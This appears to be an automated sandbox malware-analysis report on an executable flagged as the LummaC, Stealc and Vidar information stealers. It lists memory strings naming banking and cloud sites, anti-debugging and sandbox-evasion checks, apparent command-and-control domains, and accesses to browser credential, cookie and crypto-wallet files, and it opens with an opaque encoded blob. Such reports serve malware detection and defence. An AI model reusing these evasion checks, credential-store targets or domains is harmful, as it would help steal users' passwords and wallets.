FvIFHXeNzFOImgdPrgmjAMhUWbEtZ/PgBiMjO53FJdU/xzg9c6TxBoRmY16y4Y848HwUoXxzmtQKWgpaveUB6QL6BRVX0dhXpJozO4YlgzDoSHmZEWvb+DpzCz+U0Bj9CqcAXG8V7Fewnzentg27HJFgMJlkS+PlFwoLC5nRDdUGxh0Je8nsa7C+F0umJbMk/HhNvRFft8AyWzo6hNE9nBenAYFznfzbiOYac8cN5gDUUUzAAVfr9DpzKzv1xRnREu4ZOVv16GeAoidDuimfSIB0VekoSsbUCgoKWr0JYaFSnwnpY/3Ie92iQkvfNZ8xyQFNjQF74/QOeysHgfVp+Sb+SSFv4chbtIYLb44ZqzTYfEigOEvjtRcKC+P95RFFOvYkPRL9lWeYkz4SuiWzIOBcaYkpd9vUNk8vN73hOfkm9jUpY9HEc4SSI2+/NLoA1AFMwAGLy+Q6WgPvsekZ4U/GfAUKxexWhcM/T74BqyzwUEmhEUfX1Cp/ExuZ0WnhKsIFEUPxyHOAtiJygzWfYckBTRWlov+pLg4LJ4zQQP0G7gEJR+nMa5iaP0eSfaMAyFhVpTFf++QaIzsjickBtBf/ASEOxJFnBI4Pf4oxnghMSEGNMEMr2C5TF2K9rBmYFtowPA7F4He0oiNLqi23HORUZb0xb9/4Fls3N6XxDeE+5ikxT8TxXoS+XnLbNW80iFRgoXxzmtQKWgpavfEh5RryBQ1z6dxLtJ4fc5oNlwzwSEm9OV//yDZXOxek0Bj9CqcAXG913Hfczz8OglCDHPlhLKENW//QFktDO/XBLeUu4j0VU8HIT6C+I0eiCY88zHB1pABy/8h3amo7Ad151Ba7OVhv2cFm5aIXQ6o5syT4VEmxHX/v1A5zHz+R8RHBPvYRDUvdwGuIuz5KuiniAalgyZUte//YUnYKAr3pOfwXpll9M9mNX+GiI0K7VIMogHR1sSlf7+Q+ax9znck9zTbSPSV78exLiOp3f6oNsgHxYFHAACr/QEpnSyOw0VzFc8YdDG6k8Ge8khNvlhmTEMhUYZk5b8/0JndDD6nxCdkC9jUxJ8n1Zr2iIxK7VIOcBLzAoXxzmtQKWgpavdUB4S7WSQUn/exnnIIfb4oNu0joZE2ZPWvbxBJ7Gwug0Bj9CqcAXG9l/A/tqodfuinDWKVgMJlkS+PlFwoLK5H5BfEy1jU9S/nUR7CCd3eSfZMUzFxlsSF7w+QGIyY6hNE9nBenAb1DnXwvzaJCS981nzHJAU2FMU/7/A5HHw+9xQnhJsYBMXfdxEekkg9/jiGTSIBwbKA4S+O1FwoLF2npeP1r/mQ9c/TxBoSGGzuCDac00EBRmTVn5/gKdxMPneU18RLWKXVj6dhTraMGc6ZUgmHI/H0FQSe3jRYWM169zRD8d8YNAUv50Ee4ni9Loi23FPRIBYE5f9PoOiMLD63hMd067wAEb9mRZuWi60eGNY9ZyB11xAFXztV3azsDve0RzTrmBQ1X2eRDpIJ3d6oVhzj0ZF21FVvjxA5WCgK9zUD8d8a9obrNdI6E3wcWuimyAalgfa0xa8PMMlsjH5HhDe0m4hUla9HkY5SSF2u2Ob889EFMmAFXntV3a59nkek4/Wv+ZD1z9PEGhJIba6IhswTQQFmBEU/nzBpXGy+57THNLu4FOV/pzEuRowZzplSCYcikQfldC87Ua1NuO6HgIJwWwkkVR/3kW5CuA2+OLbMo7EBVnSUD8+QudzMLheUJ8SPHOD1zpPEGhBIjRwIZsx3IHXXEAVfO1XdrOxON9SHZAuYtGXvB3HOIugtPnn2rDPBsfZEZT/OcNk4KAr3NQPx3xoUFW5XsJoTfBxa6KbIBqWBBpT1H++AOTys7pcUdyS7aHT1b/cx/pJYPX4IRmwDMSUyYAVee1Xdryze90Uz9a
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: file.exe, 00000002.00000003.1408531669.00000000054C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696492231p
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: file.exe, 00000002.00000003.1382825840.00000000007FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|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
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: file.exe, 00000002.00000002.1635250870.0000000005470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMwareVMware[
Source: file.exe, 00000002.00000002.1635250870.0000000005470000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: file.exe, 00000002.00000002.1633438617.0000000000C3D000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000002.00000002.1635972942.0000000005FA1000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: file.exe, 00000002.00000003.1408707455.00000000054B9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7616, type: MEMORYSTR

LummaC encrypted strings found

Source: file.exe, 00000002.00000002.1633387628.0000000000A71000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: p3ar11fter.sbs
Source: file.exe, 00000002.00000002.1633387628.0000000000A71000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 3xp3cts1aim.sbs
Source: file.exe, 00000002.00000002.1633387628.0000000000A71000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: peepburry828.sbs
Source: file.exe, 00000002.00000002.1633387628.0000000000A71000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: p10tgrace.sbs
Source: file.exe, 00000002.00000002.1633387628.0000000000A71000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: processhol.sbs

Source: file.exe, 00000002.00000002.1633438617.0000000000C3D000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Program Manager
Source: file.exe, 00000002.00000002.1635972942.0000000005FA1000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: +N;Program Manager

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: file.exe, 00000002.00000003.1485051263.000000000080D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: r\MsMpeng.exe
Source: file.exe, 00000002.00000003.1490451305.0000000005480000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1484843360.0000000005480000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1484982784.0000000005482000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000002.00000003.1484951157.00000000007F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000002.00000003.1532217944.0000000005480000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 7616, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 00000002.00000002.1632829541.0000000000795000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1635741412.0000000005BD1000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1592515790.00000000080B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7616, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7616, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000002.00000003.1422362326.00000000007A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: file.exe, 00000002.00000003.1422362326.00000000007A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: file.exe, 00000002.00000003.1490671495.00000000007E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: file.exe, 00000002.00000003.1422362326.00000000007A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: file.exe, 00000002.00000003.1422362326.00000000007A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.walletlcE
Source: file.exe, 00000002.00000003.1449584416.00000000007EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: file.exe, 00000002.00000003.1422362326.00000000007A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: file.exe, 00000002.00000003.1422362326.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe, 00000002.00000003.1422362326.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
